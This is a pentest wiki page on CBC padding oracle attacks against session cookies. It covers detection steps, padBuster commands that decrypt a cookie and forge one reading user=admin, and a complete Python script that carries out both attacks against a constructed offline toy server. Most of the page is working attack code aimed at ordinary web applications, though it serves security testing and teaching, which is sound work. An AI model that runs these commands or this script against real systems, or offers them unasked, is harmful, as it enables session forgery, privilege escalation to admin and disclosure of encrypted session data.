Cobalt Vulnerability Wiki


V6 - Cryptography

Weak TLS configuration - Padding Oracle

POC

Detection:


Create an account and log in twice with it. If the cookie the application sets is identical on both logins, the value is not a random session identifier but a deterministic encryption of session data (typically CBC with a fixed IV). That alone is not a padding oracle, only the hint that one may exist. To confirm it, change the last byte of the cookie and resend it: if corrupt padding produces a visibly different response (an error page, HTTP 500, a distinct error message or timing) than a cookie that merely decrypts to garbage, the application leaks padding validity and a padding oracle attack is possible.



Exploitation:


Usage: padBuster.pl URL EncryptedSample BlockSize [options]



Decrypt the cookie (the sample is the cookie value as the browser sends it; padBuster expects Base64 by default, use -encoding for other formats, and -error if the oracle is an error string in a 200 page rather than an HTTP error):

/usr/bin/perl padBuster.pl URL u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV 8 -cookies auth=u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV



Forge a cookie that decrypts to a plaintext of your choice, here user=admin:

/usr/bin/perl padBuster.pl URL u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV 8 -cookies auth=u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV -plaintext user=admin
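The following Python script is an added worked example and is not code from this wiki page or from padBuster. It builds a constructed target (VulnerableServer) that issues an auth cookie of the form static IV || CBC(user=<name>) with 8-byte blocks, matching the BlockSize 8 above, and answers differently when the padding is bad. A small hash-based Feistel cipher stands in for a real block cipher so the script runs offline with no dependencies; the attack itself does not depend on which cipher is used. It then performs both steps of the exploitation above: recovering the cookie plaintext without the key, and forging a cookie that decrypts to user=admin. All names (block_cipher, recover_intermediate, padding_oracle_decrypt, padding_oracle_encrypt, demo) are assumptions for this example.

```python
import hashlib, hmac, os

BLOCK, ROUNDS = 8, 4  # 8-byte blocks (the "8" passed to padBuster above); 4 toy Feistel rounds

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, i, half):  # Feistel round function: keyed hash truncated to half a block
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:BLOCK // 2]

def block_cipher(key, block, decrypt=False):
    """Toy Feistel cipher (stand-in for a real cipher). Decrypt = swap, reversed rounds, swap."""
    l, r = (block[BLOCK // 2:], block[:BLOCK // 2]) if decrypt else (block[:BLOCK // 2], block[BLOCK // 2:])
    for i in reversed(range(ROUNDS)) if decrypt else range(ROUNDS):
        l, r = r, _xor(l, _f(key, i, r))
    return r + l if decrypt else l + r

def pad(data):
    n = BLOCK - len(data) % BLOCK  # PKCS#7: always 1..BLOCK bytes of padding
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the error the oracle leaks
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev, pt = b"", iv, pad(plaintext)
    for i in range(0, len(pt), BLOCK):
        prev = block_cipher(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_cipher(key, ct[i:i + BLOCK], decrypt=True), prev)
        prev = ct[i:i + BLOCK]
    return unpad(out)

class VulnerableServer:
    """Constructed target: auth cookie = static IV || CBC(user=<name>); error on bad padding."""
    def __init__(self):
        self.key = os.urandom(16)
        self.iv = bytes(BLOCK)  # static IV: why the cookie never changes between logins
    def issue_cookie(self, user):
        return self.iv + cbc_encrypt(self.key, self.iv, b"user=" + user.encode())
    def decrypt_cookie(self, cookie):
        return cbc_decrypt(self.key, cookie[:BLOCK], cookie[BLOCK:])
    def padding_ok(self, cookie):  # True = normal page, False = HTTP 500: this is the oracle
        try:
            self.decrypt_cookie(cookie)
            return True
        except ValueError:
            return False

def recover_intermediate(oracle, block):
    """Recover block_cipher(key, block, decrypt=True) with no key, using only the oracle."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        want = BLOCK - pos  # padding value we are forcing this round
        for guess in range(256):
            # Known bytes (j > pos) are set to decrypt to `want`; byte pos carries the guess.
            prev = bytearray(guess if j == pos else inter[j] ^ want if j > pos else 0
                             for j in range(BLOCK))
            if not oracle(bytes(prev) + block):
                continue
            if pos == BLOCK - 1:  # edge case: tail could read e.g. \x02\x02 by chance
                prev[pos - 1] ^= 0xFF  # disturb the byte before; still valid => really \x01
                if not oracle(bytes(prev) + block):
                    continue
            inter[pos] = guess ^ want
            break
        else:
            raise RuntimeError("oracle accepted nothing: not a padding oracle?")
    return bytes(inter)

def padding_oracle_decrypt(oracle, cookie):
    """What `padBuster URL sample 8 -cookies auth=sample` does: decrypt without the key."""
    blocks = [cookie[i:i + BLOCK] for i in range(0, len(cookie), BLOCK)]
    plain = b"".join(_xor(recover_intermediate(oracle, c), p) for p, c in zip(blocks, blocks[1:]))
    return unpad(plain)

def padding_oracle_encrypt(oracle, plaintext):
    """What `-plaintext user=admin` does: forge a cookie that decrypts to `plaintext`."""
    pt, out = pad(plaintext), bytes(BLOCK)  # the final ciphertext block is arbitrary
    for i in range(len(pt) - BLOCK, -1, -BLOCK):  # work backwards, one block at a time
        out = _xor(recover_intermediate(oracle, out[:BLOCK]), pt[i:i + BLOCK]) + out
    return out  # first block is the forged IV

def demo():
    server = VulnerableServer()
    c1, c2 = server.issue_cookie("alice"), server.issue_cookie("alice")
    assert c1 == c2  # detection step from the page: two logins, identical cookie
    recovered = padding_oracle_decrypt(server.padding_ok, c1)
    forged = padding_oracle_encrypt(server.padding_ok, b"user=admin")
    return recovered, server.decrypt_cookie(forged)
```

demo() returns (b'user=alice', b'user=admin'): the first value is the decrypted cookie, the second is what the server reads from the forged cookie. Each block costs at most 256 oracle queries per byte, which is why a real run against a web application produces thousands of requests and is easy to spot in access logs. The extra check at the last byte position matters in practice: without it the attack occasionally locks onto a \x02\x02 false positive and recovers garbage for the whole block.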




Impact

Low-Medium (depends on the information disclosure: what the decrypted cookie reveals, and whether a forged cookie is accepted as a valid session for another user)



Likelihood

Low-Medium

